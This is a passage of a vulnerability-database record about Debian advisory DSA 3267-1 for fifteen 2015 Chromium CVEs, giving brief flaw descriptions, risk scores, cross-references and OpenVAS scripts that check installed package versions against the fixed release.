Several vulnerabilities were discovered in the chromium web browser.
CVE-2015-1251
SkyLined discovered a use-after-free issue in speech
recognition.
CVE-2015-1252
An out-of-bounds write issue was discovered that could be used to
escape from the sandbox.
CVE-2015-1253
A cross-origin bypass issue was discovered in the DOM parser.
CVE-2015-1254
A cross-origin bypass issue was discovered in the DOM editing
feature.
CVE-2015-1255
Khalil Zhani discovered a use-after-free issue in WebAudio.
CVE-2015-1256
Atte Kettunen discovered a use-after-free issue in the SVG
implementation.
CVE-2015-1257
miaubiz discovered an overflow issue in the SVG implementation.
CVE-2015-1258
cloudfuzzer discovered an invalid size parameter used in the
libvpx library.
CVE-2015-1259
Atte Kettunen discovered an uninitialized memory issue in the
pdfium library.
CVE-2015-1260
Khalil Zhani discovered multiple use-after-free issues in chromium
{"id": "OPENVAS:1361412562310703267", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3267-1 (chromium-browser - security update)", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252\nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253\nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257\nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259\nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260\nKhalil Zhani discovered multiple use-after-free issues in chromium", "published": "2015-05-22T00:00:00", "modified": "2019-03-18T00:00:00", "epss": [{"cve": "CVE-2015-1265", "epss": 0.02414, "percentile": 0.88758, "modified": "2023-11-27"}, {"cve": "CVE-2015-1257", "epss": 0.02092, "percentile": 0.87882, "modified": "2023-11-27"}, {"cve": "CVE-2015-1263", "epss": 0.00206, "percentile": 0.58388, "modified": "2023-11-27"}, {"cve": "CVE-2015-1251", "epss": 0.05727, "percentile": 0.92538, "modified": "2023-11-27"}, {"cve": "CVE-2015-1262", "epss": 0.01297, "percentile": 0.84321, "modified": "2023-11-27"}, {"cve": "CVE-2015-1260", "epss": 0.0123, "percentile": 0.83839, "modified": "2023-11-27"}, {"cve": "CVE-2015-1253", "epss": 0.01549, "percentile": 0.85728, "modified": "2023-11-27"}, {"cve": "CVE-2015-1254", "epss": 0.00459, "percentile": 0.72566, "modified": "2023-11-27"}, {"cve": "CVE-2015-1259", "epss": 0.01297, "percentile": 0.84321, "modified": "2023-11-27"}, {"cve": "CVE-2015-1252", "epss": 0.02369, "percentile": 0.88658, "modified": "2023-11-27"}, {"cve": "CVE-2015-1256", "epss": 0.06702, "percentile": 0.93095, "modified": "2023-11-27"}, {"cve": "CVE-2015-1261", "epss": 0.00365, "percentile": 0.69351, "modified": "2023-11-27"}, {"cve": "CVE-2015-1258", "epss": 0.02111, "percentile": 0.87932, "modified": "2023-11-27"}, {"cve": "CVE-2015-1255", "epss": 0.0142, "percentile": 0.85026, "modified": "2023-11-27"}, {"cve": "CVE-2015-1264", "epss": 0.00229, "percentile": 0.61, "modified": "2023-11-27"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703267", "reporter": "Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2015/dsa-3267.html"], "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "immutableFields": [], "lastseen": "2019-05-29T18:36:16", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201505-14"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0850"]}, {"type": "chrome", "idList": ["GCSA-990503644729999677"]}, {"type": "cve", "idList": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265", "CVE-2015-1288"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3267-1:32EBE", "DEBIAN:DSA-3267-1:F1492", "DEBIAN:DSA-3315-1:9DB7E", "DEBIAN:DSA-3315-1:DF83F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-1251", "DEBIANCVE:CVE-2015-1252", "DEBIANCVE:CVE-2015-1253", "DEBIANCVE:CVE-2015-1254", "DEBIANCVE:CVE-2015-1255", "DEBIANCVE:CVE-2015-1256", "DEBIANCVE:CVE-2015-1257", "DEBIANCVE:CVE-2015-1258", "DEBIANCVE:CVE-2015-1259", "DEBIANCVE:CVE-2015-1260", "DEBIANCVE:CVE-2015-1261", "DEBIANCVE:CVE-2015-1262", "DEBIANCVE:CVE-2015-1263", "DEBIANCVE:CVE-2015-1264", "DEBIANCVE:CVE-2015-1265", "DEBIANCVE:CVE-2015-1288"]}, {"type": "fedora", "idList": ["FEDORA:4F29E60478E0", "FEDORA:8A9B7608B7FE", "FEDORA:C19BF612F03E"]}, {"type": "freebsd", "idList": ["A9D456B4-FE4C-11E4-AD15-00262D5ED8EE"]}, {"type": "gentoo", "idList": ["GLSA-201506-04"]}, {"type": "kaspersky", "idList": ["KLA10585"]}, {"type": "mageia", "idList": ["MGASA-2015-0235", "MGASA-2015-0249", "MGASA-2015-0288"]}, {"type": "nessus", "idList": ["8782.PASL", "DEBIAN_DSA-3267.NASL", "DEBIAN_DSA-3315.NASL", "FEDORA_2015-15934.NASL", "FEDORA_2015-15935.NASL", "FEDORA_2015-15936.NASL", "FREEBSD_PKG_A9D456B4FE4C11E4AD1500262D5ED8EE.NASL", "GENTOO_GLSA-201506-04.NASL", "GOOGLE_CHROME_43_0_2357_65.NASL", "MACOSX_GOOGLE_CHROME_43_0_2357_65.NASL", "OPENSUSE-2015-390.NASL", "REDHAT-RHSA-2015-1023.NASL", "UBUNTU_USN-2610-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121381", "OPENVAS:1361412562310130090", "OPENVAS:1361412562310130127", "OPENVAS:1361412562310703315", "OPENVAS:1361412562310805631", "OPENVAS:1361412562310805632", "OPENVAS:1361412562310805633", "OPENVAS:1361412562310842213", "OPENVAS:1361412562310869961", "OPENVAS:1361412562310869991", "OPENVAS:703267", "OPENVAS:703315"]}, {"type": "osv", "idList": ["OSV:DSA-3267-1", "OSV:DSA-3315-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139874"]}, {"type": "prion", "idList": ["PRION:CVE-2015-1251", "PRION:CVE-2015-1252", "PRION:CVE-2015-1253", "PRION:CVE-2015-1254", "PRION:CVE-2015-1255", "PRION:CVE-2015-1256", "PRION:CVE-2015-1257", "PRION:CVE-2015-1258", "PRION:CVE-2015-1259", "PRION:CVE-2015-1260", "PRION:CVE-2015-1261", "PRION:CVE-2015-1262", "PRION:CVE-2015-1263", "PRION:CVE-2015-1264", "PRION:CVE-2015-1265", "PRION:CVE-2015-1288"]}, {"type": "redhat", "idList": ["RHSA-2015:1023"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32136", "SECURITYVULNS:DOC:32351", "SECURITYVULNS:VULN:14435"]}, {"type": "threatpost", "idList": ["THREATPOST:45D2D399F79C59D30CB09CDC7A87747D"]}, {"type": "ubuntu", "idList": ["USN-2610-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-1251", "UB:CVE-2015-1252", "UB:CVE-2015-1253", "UB:CVE-2015-1254", "UB:CVE-2015-1255", "UB:CVE-2015-1256", "UB:CVE-2015-1257", "UB:CVE-2015-1258", "UB:CVE-2015-1259", "UB:CVE-2015-1260", "UB:CVE-2015-1261", "UB:CVE-2015-1262", "UB:CVE-2015-1263", "UB:CVE-2015-1264", "UB:CVE-2015-1265", "UB:CVE-2015-1288"]}, {"type": "zdi", "idList": ["ZDI-15-236"]}, {"type": "zdt", "idList": ["1337DAY-ID-23663", "1337DAY-ID-24047", "1337DAY-ID-26408"]}]}, "score": {"value": 9.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["SPEECH"]}, {"type": "chrome", "idList": ["GCSA-990503644729999677"]}, {"type": "cve", "idList": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3315-1:DF83F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-1253", "DEBIANCVE:CVE-2015-1256"]}, {"type": "fedora", "idList": ["FEDORA:8A9B7608B7FE"]}, {"type": "gentoo", "idList": ["GLSA-201506-04"]}, {"type": "kaspersky", "idList": ["KLA10585"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3267.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:703315"]}, {"type": "redhat", "idList": ["RHSA-2015:1023"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14435"]}, {"type": "ubuntu", "idList": ["USN-2610-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-1260", "UB:CVE-2015-1261"]}, {"type": "zdi", "idList": ["ZDI-15-236"]}, {"type": "zdt", "idList": ["1337DAY-ID-23663"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-1265", "epss": "0.025680000", "percentile": "0.885640000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1257", "epss": "0.015890000", "percentile": "0.853160000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1263", "epss": "0.002180000", "percentile": "0.580110000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1251", "epss": "0.056040000", "percentile": "0.920590000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1262", "epss": "0.010190000", "percentile": "0.814700000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1260", "epss": "0.009310000", "percentile": "0.806110000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1253", "epss": "0.011740000", "percentile": "0.828060000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1254", "epss": "0.004590000", "percentile": "0.714510000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1259", "epss": "0.010190000", "percentile": "0.814700000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1252", "epss": "0.018010000", "percentile": "0.862450000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1256", "epss": "0.071340000", "percentile": "0.929140000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1261", "epss": "0.003770000", "percentile": "0.685550000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1258", "epss": "0.021580000", "percentile": "0.875480000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1255", "epss": "0.010760000", "percentile": "0.820160000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1264", "epss": "0.002380000", "percentile": "0.601010000", "modified": "2023-03-15"}], "vulnersScore": 9.9}, "_state": {"dependencies": 1701118327, "score": 1701118880, "epss": 0}, "_internal": {"score_hash": "6f03439c4de59579d0937488e36b2663"}, "pluginID": "1361412562310703267", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3267.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3267-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703267\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\",\n \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_name(\"Debian Security Advisory DSA 3267-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-22 00:00:00 +0200 (Fri, 22 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3267.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252\nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253\nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257\nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259\nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260\nKhalil Zhani discovered multiple use-after-free issues in chromium's\ninterface to the WebRTC library.\n\nCVE-2015-1261\nJuho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\nmiaubiz discovered the use of an uninitialized class member in\nfont handling.\n\nCVE-2015-1263\nMike Ruddy discovered that downloading the spellcheck dictionary\nwas not done over HTTPS.\n\nCVE-2015-1264\nK0r3Ph1L discovered a cross-site scripting issue that could be\ntriggered by bookmarking a site.\n\nCVE-2015-1265\nThe chrome 43 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.3.61.21.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"43.0.2357.65-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"redhat": [{"lastseen": "2023-05-26T02:21:32", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253, CVE-2015-1254,\nCVE-2015-1255, CVE-2015-1256, CVE-2015-1257, CVE-2015-1258, CVE-2015-1259,\nCVE-2015-1260, CVE-2015-1261, CVE-2015-1262, CVE-2015-1263, CVE-2015-1264,\nCVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 43.0.2357.65, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "cvss3": {}, "published": "2015-05-25T00:00:00", "type": "redhat", "title": "(RHSA-2015:1023) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2018-06-07T05:04:24", "id": "RHSA-2015:1023", "href": "https://access.redhat.com/errata/RHSA-2015:1023", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:53:43", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251 \nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252 \nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253 \nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254 \nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255 \nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256 \nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257 \nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258 \ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259 \nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260 \nKhalil Zhani discovered multiple use-after-free issues in chromium", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3267-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703267", "href": "http://plugins.openvas.org/nasl.php?oid=703267", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3267.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3267-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703267);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\",\n \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_name(\"Debian Security Advisory DSA 3267-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-05-22 00:00:00 +0200 (Fri, 22 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3267.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251 \nSkyLined discovered a use-after-free issue in speech\nrecognition.\n\nCVE-2015-1252 \nAn out-of-bounds write issue was discovered that could be used to\nescape from the sandbox.\n\nCVE-2015-1253 \nA cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254 \nA cross-origin bypass issue was discovered in the DOM editing\nfeature.\n\nCVE-2015-1255 \nKhalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256 \nAtte Kettunen discovered a use-after-free issue in the SVG\nimplementation.\n\nCVE-2015-1257 \nmiaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258 \ncloudfuzzer discovered an invalid size parameter used in the\nlibvpx library.\n\nCVE-2015-1259 \nAtte Kettunen discovered an uninitialized memory issue in the\npdfium library.\n\nCVE-2015-1260 \nKhalil Zhani discovered multiple use-after-free issues in chromium's\ninterface to the WebRTC library.\n\nCVE-2015-1261 \nJuho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262 \nmiaubiz discovered the use of an uninitialized class member in\nfont handling.\n\nCVE-2015-1263 \nMike Ruddy discovered that downloading the spellcheck dictionary\nwas not done over HTTPS.\n\nCVE-2015-1264 \nK0r3Ph1L discovered a cross-site scripting issue that could be\ntriggered by bookmarking a site.\n\nCVE-2015-1265 \nThe chrome 43 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.3.61.21.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"43.0.2357.65-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-19T22:14:07", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805633\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in 